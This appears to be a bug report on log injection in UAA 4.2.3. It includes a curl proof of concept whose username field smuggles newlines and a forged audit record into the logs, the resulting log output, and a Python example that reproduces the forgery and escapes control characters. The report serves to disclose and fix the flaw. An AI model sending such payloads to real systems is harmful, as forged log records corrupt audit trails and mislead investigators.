Summary

It's possible for a user to forge log entries by inserting arbitrary strings into the log, for example extra lines that look like genuine log records.

Actual Behavior

  • Run a curl command similar to the one below:
curl -k http://localhost:8080/login -H 'Content-Type':'application/x-www-form-urlencoded' -d 'username=not_valid_user, 
***********************************************
INJECT WHATEVER YOU WANT
[2017-05-31 10:25:18.435] - [http-bio-30031-exec-6] .... TRACE --- Audit:
PrincipalAuthenticationFailure ('null'): principal=not_valid_user, 
***********************************************
&password=pwd'

Things you see in the logs:

[2017-07-20 23:14:32.116] uaa - 1179 [http-nio-8080-exec-5] .... DEBUG --- LdapAuthenticationProvider: Processing authentication request for user: not_valid_user,
************************************************************
INJECT WHATEVER YOU WANT
[2017-05-31 10:25:18.435] - [http-bio-30031-exec-6] .... TRACE --- Audit:
PrincipalAuthenticationFailure ('null'): principal=not_valid_user, 
************************************************************
[2017-07-20 23:14:32.117] uaa - 1179 [http-nio-8080-exec-5] .... DEBUG --- FilterBasedLdapUserSearch: Searching for user 'not_valid_user
************************************************************
INJECT WHATEVER YOU WANT
[2017-05-31 10:25:18.435] - [http-bio-30031-exec-6] .... TRACE --- Audit:
PrincipalAuthenticationFailure ('null'): principal=not_valid_user, 
************************************************************
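The forged records above exist because a newline inside the username becomes a line break in the log file. The following added example (not UAA's own code) models the DEBUG line from the report, shows that the constructed payload yields two records where one request was made, and escapes control characters so the value can no longer span lines:

```python
"""Neutralising newline injection in a log field (added example)."""
import re

# One log record per physical line, so anything that can emit a line break
# into a field can forge a record. Neutralise CR, LF and other C0 controls.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def sanitize_for_log(value: str) -> str:
    """Escape control characters as \\xNN so the value cannot span lines."""
    return _CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), value)


def log_auth_attempt(username: str, sanitize: bool = True) -> str:
    """Format the LdapAuthenticationProvider DEBUG line from the report,
    with (hardened) or without (as reported) escaping of the username."""
    field = sanitize_for_log(username) if sanitize else username
    return ("[2017-07-20 23:14:32.116] uaa - 1179 [http-nio-8080-exec-5] "
            "DEBUG --- LdapAuthenticationProvider: "
            f"Processing authentication request for user: {field}")


# A record starts with a bracketed timestamp at the beginning of a line.
_RECORD_START = re.compile(r"^\[\d{4}-\d{2}-\d{2} [\d:.]+\]", re.MULTILINE)


def count_records(log_text: str) -> int:
    """Number of log records a reader would see in the given text."""
    return len(_RECORD_START.findall(log_text))


# Constructed username modelled on the curl body in the report: the real
# value followed by a fake TRACE audit record on its own line.
FORGED_USERNAME = ("not_valid_user,\n"
                   "[2017-05-31 10:25:18.435] - [http-bio-30031-exec-6] "
                   "TRACE --- Audit: PrincipalAuthenticationFailure ('null'): "
                   "principal=not_valid_user")

if __name__ == "__main__":
    raw = log_auth_attempt(FORGED_USERNAME, sanitize=False)
    safe = log_auth_attempt(FORGED_USERNAME)
    print(raw)
    print(safe)
    # One request, but the unsanitised line reads as two records.
    print(count_records(raw), count_records(safe))  # 2 1
```

In Java logging stacks the same effect is available without custom code, for example Log4j 2's `%enc{%m}{CRLF}` pattern converter, which encodes CR and LF in the message before it is written.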

Expected Behavior

It is not possible to add extra lines to the logs.

Version

4.2.3

Notes

We changed the logging level for LdapAuthenticationProvider and FilterBasedLdapUserSearch to INFO to avoid printing the username.

Thanks!